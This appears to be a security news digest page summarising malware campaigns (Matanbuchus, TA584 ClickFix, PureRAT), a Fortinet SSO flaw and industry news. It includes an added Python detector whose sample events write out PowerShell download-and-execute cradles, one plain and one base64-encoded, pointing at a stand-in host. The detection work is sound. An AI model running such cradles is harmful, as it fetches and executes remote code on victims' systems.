Author: Staff Writer
John Marcelli is a staff writer for the CISO Brief, with a passion for exploring and writing about the ever-evolving world of technology. From emerging trends to in-depth reviews of the latest gadgets, John stays at the forefront of innovation, delivering engaging content that informs and inspires readers. When he's not writing, he enjoys experimenting with new tech tools and diving into the digital landscape.
Essential Insights
- Matanbuchus is resurfacing with refined tactics, using MSI installer packages for stealthy delivery and evading signature-based detection by regularly modifying its components.
- Attackers disguise the MSI files as legitimate software, so the malware installs silently and establishes command-and-control (C2) communication for follow-on activity.
- Continuous changes to the malware's code, structure, and obfuscation make static detection unreliable, forcing analysts to rely on behavioral indicators rather than simple signatures.
- To defend against this evolving threat, organizations should monitor MSI execution (msiexec.exe launches and their parent processes) and outbound network activity, and pair behavior-based detection with threat intelligence.
The Issue
Matanbuchus, a stealthy malware, has resurfaced…
Quick Takeaways
- Federal authorities warn of a critical vulnerability in Fortinet FortiCloud SSO (CVE-2026-24858) that allows unauthorized access to devices linked to other FortiCloud accounts.
- Confirmed malicious activity includes attackers altering firewall settings and creating unauthorized administrator accounts to obtain VPN access.
- Users who patched the earlier vulnerabilities (CVE-2025-59718 and CVE-2025-59719) must upgrade again, because those fixes do not cover the new flaw.
- Fortinet disabled and later restored FortiCloud SSO access while advising customers to upgrade to fixed versions; roughly 10,000 vulnerable instances have been reported.
Critical Vulnerability Exploited
Federal authorities, along with security researchers, have issued urgent warnings about a significant flaw in Fortinet's…
Essential Insights
- TA584, a sophisticated cybercriminal group, has expanded its toolkit with the Tsundere Bot malware, combining social engineering with layered evasion tactics.
- Its campaigns intensified in 2025, using phishing emails that impersonate trusted entities and automating malware deployment through a malware-as-a-service platform that uses a blockchain for communication.
- The infection chain relies on ClickFix lures: fake CAPTCHA verification pages coax the victim into running a PowerShell command that downloads and executes the malware, and infections can escalate to ransomware.
- Tsundere Bot includes anti-analysis checks, geographic restrictions, and resilient command-and-control methods, making detection and disruption increasingly difficult for defenders.
The Issue
In…
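As an added example, not code from this page or from the Matanbuchus and TA584 research it summarizes, the Python below is a small detector over constructed Sysmon-style process creation events. It covers the two delivery patterns described in the two items above: msiexec.exe installing a package fetched over HTTP(S) or silently from a user-writable path (the Matanbuchus item), and a PowerShell download cradle whose parent is explorer.exe, which is what a ClickFix lure looks like once the victim pastes the command into the Run dialog (the TA584 item). It decodes -EncodedCommand payloads before matching, because that is where cradles are usually hidden. The field names mirror Sysmon Event ID 1 (Image, CommandLine, ParentImage); every event, path and address in it is constructed for the example.

```python
import base64
import re


def powershell_encoded(script: str) -> str:
    """Build the -EncodedCommand form PowerShell expects: UTF-16LE text, base64-encoded."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed Sysmon Event ID 1-style events (not real telemetry, not from the campaigns discussed).
SAMPLE_EVENTS = [
    {   # benign: deployment agent installs a package from a file share
        "Image": r"C:\Windows\System32\msiexec.exe",
        "CommandLine": r'msiexec.exe /i "\\fs01\deploy\7zip.msi" /qn',
        "ParentImage": r"C:\Windows\CCM\CcmExec.exe",
    },
    {   # package pulled straight from the internet and installed without UI
        "Image": r"C:\Windows\System32\msiexec.exe",
        "CommandLine": r"msiexec.exe /i https://cdn.example.invalid/update.msi /qn",
        "ParentImage": r"C:\Windows\explorer.exe",
    },
    {   # package dropped in Downloads and installed quietly
        "Image": r"C:\Windows\System32\msiexec.exe",
        "CommandLine": r"msiexec /quiet /i C:\Users\alice\Downloads\Invoice_2025.msi",
        "ParentImage": r"C:\Windows\explorer.exe",
    },
    {   # ClickFix-style: download cradle pasted into the Run dialog (parent is the shell)
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'powershell -w hidden -c "iwr http://10.0.0.5/a.txt | iex"',
        "ParentImage": r"C:\Windows\explorer.exe",
    },
    {   # same pattern, cradle hidden inside an -EncodedCommand argument
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -nop -w hidden -enc "
        + powershell_encoded("IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/b.ps1')"),
        "ParentImage": r"C:\Windows\explorer.exe",
    },
    {   # benign: maintenance script launched by a scheduled task
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -File C:\Scripts\rotate-logs.ps1",
        "ParentImage": r"C:\Windows\System32\svchost.exe",
    },
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
URL_RE = re.compile(r"https?://", re.I)
QUIET_RE = re.compile(r"(?:^|\s)/(?:qn|qb|quiet|passive|q)(?=\s|$)", re.I)
USER_WRITABLE_RE = re.compile(r"\\(?:Downloads|AppData|Temp|ProgramData|Public)\\", re.I)
CRADLE_RE = re.compile(
    r"invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|downloadstring|downloadfile|"
    r"invoke-expression|\biex\b|start-bitstransfer|\bcertutil\b",
    re.I,
)
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline: str) -> str:
    """Append the decoded -EncodedCommand payload (if any) so the rules can see through it."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        return cmdline + " " + base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmdline


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list:
    """Return the names of the rules the event triggers (empty list when nothing matches)."""
    image, parent = basename(event["Image"]), basename(event["ParentImage"])
    cmd = decode_encoded_command(event["CommandLine"])
    hits = []
    if image == "msiexec.exe":
        if URL_RE.search(cmd):
            hits.append("msi_remote_install")            # package fetched over HTTP(S)
        elif QUIET_RE.search(cmd) and USER_WRITABLE_RE.search(cmd):
            hits.append("msi_quiet_from_user_path")      # silent install of a user-dropped package
    elif image in SCRIPT_HOSTS and CRADLE_RE.search(cmd):
        # A download-and-run cradle parented by the shell is the ClickFix shape:
        # the user typed or pasted it into Run or a terminal opened from the desktop.
        hits.append("clickfix_cradle" if parent == "explorer.exe" else "download_cradle")
    return hits


def scan(events: list) -> list:
    """Run every event through the rules and return (image, rules) for the ones that fire."""
    return [(basename(ev["Image"]), classify(ev)) for ev in events if classify(ev)]


if __name__ == "__main__":
    for image, rules in scan(SAMPLE_EVENTS):
        print(f"{image}: {', '.join(rules)}")
```

In production the same rules run over the EDR or Sysmon feed rather than a list of dicts; the useful signal is the combination (msiexec plus a URL, a cradle plus an explorer.exe parent), not any single token, which is why benign installs from a share and scheduled scripts pass through untouched.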
Summary Points
- The U.S. CISA has issued a warning about a critical vulnerability (CVE-2026-24858) in Fortinet's FortiCloud SSO that lets attackers bypass authentication, hijack sessions, and escalate privileges.
- Exploitation involves compromising a FortiCloud account and abusing the authentication flaw to reach unrelated devices such as FortiAnalyzer, FortiManager, FortiOS, or FortiProxy, which can pave the way for ransomware deployment.
- The flaw has been actively exploited in the wild: threat actors scan for exposed endpoints, gain initial access, and pivot to high-value targets, which raises the risk, particularly in zero-trust environments.
- Fortinet recommends immediate updates to patched versions, disabling FortiCloud SSO if it is not needed, enforcing MFA, and monitoring for…
Essential Insights
- Cyberattackers increasingly rely on legitimate access and stolen credentials, with 97% of incidents involving passwords, marking a shift from technical exploitation to the misuse of existing accounts.
- Business email compromise (BEC) accounts for over 70% of attacks and often goes undetected for weeks, with phishing as the usual initial entry point.
- Ransomware remains a major threat, enabled by Ransomware-as-a-Service and the sale of insider access, blurring the line between external and insider threats.
- Manufacturing, construction, and logistics are the most affected industries, typically compromised through unprotected applications, insecure remote access, or phishing.
The Issue
Eye Security's 2026 State of Incident Response Report…
Summary Points
- A Vietnamese cybercrime group is using AI-generated malicious code in a widespread phishing campaign that distributes PureRAT malware via fake job offers.
- The campaign relies on social engineering: phishing emails and ZIP archives that mimic legitimate employment opportunities from well-known companies.
- Researchers identified AI-created scripts in the malware containing detailed Vietnamese comments and emoji symbols, indicating that the code was produced with AI assistance rather than written by hand.
- The malware establishes persistence through hidden directories, DLL sideloading, and registry modifications, while masking its activity behind legitimate-looking files and documents.
Underlying Problem
In December 2025, a Vietnamese cybercrime group launched a sophisticated phishing campaign using artificial…
Silent Push: Human-Led Phishing Attack Targets Okta SSO Accounts Across Organizations
Essential Insights
- New research from Silent Push reveals a large-scale, human-operated identity theft campaign targeting Okta SSO and other platforms, which relies primarily on vishing to bypass multi-factor authentication and gain persistent access.
- The SLSH group, linked to threats such as Scattered Spider, LAPSUS$, and ShinyHunters, uses live phishing panels to capture credentials and MFA codes in real time during the phone call, enabling immediate access and lateral movement within the organization.
- Over the past month, targeted industries have included technology, fintech, healthcare, real estate, energy, retail, and legal services, with prominent organizations such as Atlassian, Moderna, Zillow, Halliburton, and Sonos among those affected.
Silent Push…
Quick Takeaways
- Elimination of Security Attestation: The Trump administration has rescinded a required security attestation for federal software vendors, shifting accountability for product security back to individual agencies.
- Mixed Reactions: The cybersecurity community is divided, with some experts arguing this move undermines progress toward better security practices, while others see a risk-based approach as more effective.
- Potential Fragmentation: Without a standardized requirement, there may be inconsistent oversight across agencies, potentially complicating compliance for vendors and risking overall security improvements.
- Concern Over Security Impacts: Experts warn that relaxing oversight could weaken vendor accountability, endangering both government and private sector users who…
Essential Insights
- Strategic Appointments: The Chertoff Group has appointed cybersecurity leaders Michael Johnson, Sammy Migues, and John Steven as senior advisors to bolster its advisory services amid growing cyber risks.
- Expertise and Innovation: The firm integrates top-tier private and governmental cybersecurity expertise to enhance practical guidance for clients across various industries facing complex technological challenges.
- Diverse Specializations: Johnson comes from Meta with extensive experience in FinTech security; Migues is renowned for his work on software security frameworks; and Steven has significant influence in application security and automation strategies.
- Enhanced Advisory Services: This expansion positions The Chertoff Group to deliver stronger…
Essential Insights
- Fortinet is dealing with a critical, actively exploited zero-day vulnerability (CVE-2026-24858) that allows attackers to bypass authentication and gain privileged access to multiple products.
- The vulnerability affects several Fortinet products, including FortiAnalyzer, FortiManager, FortiOS, FortiProxy, and FortiWeb, and carries a CVSS score of 9.8; at the time of writing, patches were not yet available.
- Attackers have exploited the flaw to create unauthorized accounts and reconfigure firewalls, typically on devices with FortiCloud SSO enabled, many of which remain exposed online.
- Despite the ongoing vulnerabilities and criticism of Fortinet's delayed responses, security experts emphasize the importance of promptly applying best practices…